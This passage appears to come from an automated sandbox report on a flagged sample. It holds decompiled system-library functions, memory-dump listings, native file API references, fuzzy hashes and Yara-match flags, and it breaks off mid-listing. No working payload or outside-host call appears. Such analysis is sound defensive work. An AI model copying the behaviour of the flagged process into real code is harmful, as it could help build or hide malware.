						}
					} else {
						L3:
						_t40 = E00A6FED6(_t17,  &_v52);
						if(_a8 != 0) {
							_t26 = E00A67707(_t40,  &_v8 - _t40 >> 1, L":%u", _a8 & 0x0000ffff);
							_t44 = _t44 + 0x10;
							_t40 = _t40 + _t26 * 2;
						}
						_t39 = (_t40 -  &_v52 >> 1) + 1;
						if( *_t38 < _t39) {
							 *_t38 = _t39;
							goto L7;
						} else {
							E00A32340(_t31,  &_v52, _t39 + _t39);
							 *_t38 = _t39;
							_t18 = 0;
						}
					}
				}
				return E00A3E1B4(_t18, _t31, _v8 ^ _t43, _t37, _t38, _t39);
			}


















                                0x00a6fe4f
                                0x00a6fe57
                                0x00a6fe5e
                                0x00a6fe61
                                0x00a6fe65
                                0x00a6fe6a
                                0x00a6fe6f
                                0x00a6feca
                                0x00a6feca
                                0x00a6fe75
                                0x00a6fe77
                                0x00a9ea62
                                0x00000000
                                0x00a9ea68
                                0x00000000
                                0x00a9ea68
                                0x00a6fe7d
                                0x00a6fe7d
                                0x00a6fe8c
                                0x00a6fe8e
                                0x00a9ea87
                                0x00a9ea8c
                                0x00a9ea8f
                                0x00a9ea8f
                                0x00a6fe9b
                                0x00a6fe9e
                                0x00a9ea97
                                0x00000000
                                0x00a6fea4
                                0x00a6fead
                                0x00a6feb5
                                0x00a6feb7
                                0x00a6feb7
                                0x00a6fe9e
                                0x00a6fe77
                                0x00a6fec7

                                APIs
                                  • Part of subcall function 00A6FED6: ___swprintf_l.LIBCMT ref: 00A6FEFD
                                • ___swprintf_l.LIBCMT ref: 00A9EA87
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: :%u$v"Aw
                                • API String ID: 48624451-3516556356
                                • Opcode ID: 96bf86181e2da36c9767d37cbcc9bffd86d7eaf84014aa3399d0653bf68aa8e3
                                • Instruction ID: 6fec60e1a7da5773086958402d29ddf61447d0ec67e48ef3e50e6a868934854f
                                • Opcode Fuzzy Hash: 96bf86181e2da36c9767d37cbcc9bffd86d7eaf84014aa3399d0653bf68aa8e3
                                • Instruction Fuzzy Hash: 0911B172600219EFCB10EFA4E9409BFBBBCFB54700B50452AF815C7152EB31EA04CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00AD3EBF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                                Download Yara Rule
                                C-Code - Quality: 92%
                                			E00AD3EBF(void* __edx, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v8;
				char _v10;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t15;
				void* _t25;
				intOrPtr _t26;
				void* _t32;
				intOrPtr _t33;
				void* _t34;
				intOrPtr* _t36;
				signed int _t37;
				void* _t38;

				_t32 = __edx;
				_t12 =  *0xb12088; // 0x77412276
				_v8 = _t12 ^ _t37;
				_t14 = _a4;
				_t26 = _a12;
				_t36 = _a16;
				if(_a4 == 0 || _t36 == 0 || _t26 == 0 &&  *_t36 != _t26) {
					L8:
					_t15 = 0xc000000d;
				} else {
					_t34 = E00AD3E86(_t14,  &_v32);
					if(_a8 != 0) {
						_t25 = E00AE894A(_t34,  &_v10 - _t34, ":%u", _a8 & 0x0000ffff);
						_t38 = _t38 + 0x10;
						_t34 = _t34 + _t25;
					}
					_t33 = _t34 -  &_v32 + 1;
					if( *_t36 >= _t33) {
						E00A32340(_t26,  &_v32, _t33);
						 *_t36 = _t33;
						_t15 = 0;
					} else {
						 *_t36 = _t33;
						goto L8;
					}
				}
				return E00A3E1B4(_t15, _t26, _v8 ^ _t37, _t32, _t33, _t36);
			}



















                                0x00ad3ebf
                                0x00ad3ec7
                                0x00ad3ece
                                0x00ad3ed1
                                0x00ad3ed5
                                0x00ad3ed9
                                0x00ad3edf
                                0x00ad3f2e
                                0x00ad3f2e
                                0x00ad3eed
                                0x00ad3efc
                                0x00ad3efe
                                0x00ad3f18
                                0x00ad3f1d
                                0x00ad3f20
                                0x00ad3f20
                                0x00ad3f27
                                0x00ad3f2a
                                0x00ad3f4a
                                0x00ad3f52
                                0x00ad3f54
                                0x00ad3f2c
                                0x00ad3f2c
                                0x00000000
                                0x00ad3f2c
                                0x00ad3f2a
                                0x00ad3f41

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: :%u$v"Aw
                                • API String ID: 48624451-3516556356
                                • Opcode ID: 3ac3c082654f51ccf6874b6bdbbe3bb538ecfcb7638845e8127c32e557ae0107
                                • Instruction ID: b8f0b7642c3cbe9edf5255c1520b4b6801476c7571306e7165e2999536418b38
                                • Opcode Fuzzy Hash: 3ac3c082654f51ccf6874b6bdbbe3bb538ecfcb7638845e8127c32e557ae0107
                                • Instruction Fuzzy Hash: 84119477D0010AABCF10EF65D8419FB73F8AB98710B14852AF946DB241EA74DA45CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Analysis Process: cmd.exe PID: 2232 Parent PID: 1388 cmd.exeCOMMON

                                Executed Functions

                                Function 00099D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00094B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094B87,007A002E,00000000,00000060,00000000,00000000), ref: 00099DAD
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: CreateFile
                                • String ID: .z`
                                • API String ID: 823142352-1441809116
                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                • Instruction ID: 63cb80dc364295cf340fb5e817a82d429ee0f25d7d9631c0e925bfb349143eeb
                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                • Instruction Fuzzy Hash: B8F0B2B2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00099E8F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtClose.NTDLL( M,?,?,00094D20,00000000,FFFFFFFF), ref: 00099EB5
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: Close
                                • String ID: M
                                • API String ID: 3535843008-4211545630
                                • Opcode ID: de0a87add22e456857abe52870cdbadee32c2947aa417bc47def53d5c8f1c4f8
                                • Instruction ID: 399a62789e1002bcb987e9d2689f6f8c75d79fa84cdbfb3705a0f27b77a17b98
                                • Opcode Fuzzy Hash: de0a87add22e456857abe52870cdbadee32c2947aa417bc47def53d5c8f1c4f8
                                • Instruction Fuzzy Hash: 54E01275600114BFDB20DFA5CC85EDB7B69EF44750F158559B95DAB242C530E501CBD0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00099E90, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtClose.NTDLL( M,?,?,00094D20,00000000,FFFFFFFF), ref: 00099EB5
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: Close
                                • String ID: M
                                • API String ID: 3535843008-4211545630
                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                • Instruction ID: 38dda25029afe3172f76972a2fe7647abf86c968db1867b573677de5ec081c4c
                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                • Instruction Fuzzy Hash: 06D012752002146BD710EB98CC85ED7775CEF44750F154455BA585B242C530F50086E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00099E0A, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtReadFile.NTDLL(?,?,FFFFFFFF,00094A01,?,?,?,?,00094A01,FFFFFFFF,?,BM,?,00000000), ref: 00099E55
                                Memory Dump Source
                                • Source File: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 351bf17eb1876d0f5e2a06a196838ca43312f214bcfe1f7101c47b56aa237127
                                • Instruction ID: 83dcea74ea91e68c01399365e54e03919c94597225368f9d0a20acd27d6a5dfa
                                • Opcode Fuzzy Hash: 351bf17eb1876d0f5e2a06a196838ca43312f214bcfe1f7101c47b56aa237127
                                • Instruction Fuzzy Hash: BAF0F4B2200108AFDB14DF98CC84EEB77A9FF8C754F158248FA1DA7241CA30E911CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00099E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtReadFile.NTDLL(?,?,FFFFFFFF,00094A01,?,?,?,?,00094A01,FFFFFFFF,?,BM,?,00000000), ref: 00099E55
                                Memory Dump Source
                                • Source File: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                • Instruction ID: c1dbbdede6ca734d3b6ae3ff421215ba9194ca1b8af34a3d35a52b2938fa7461
                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                • Instruction Fuzzy Hash: 38F0A4B2200208ABCB14DF89DC81EEB77ADEF8C754F158248BA1DA7241D630E8118BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022900C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022907AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0228FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0228FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0228FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0228FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0228F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0228F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0228FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0228FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0228FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0228FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0228FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
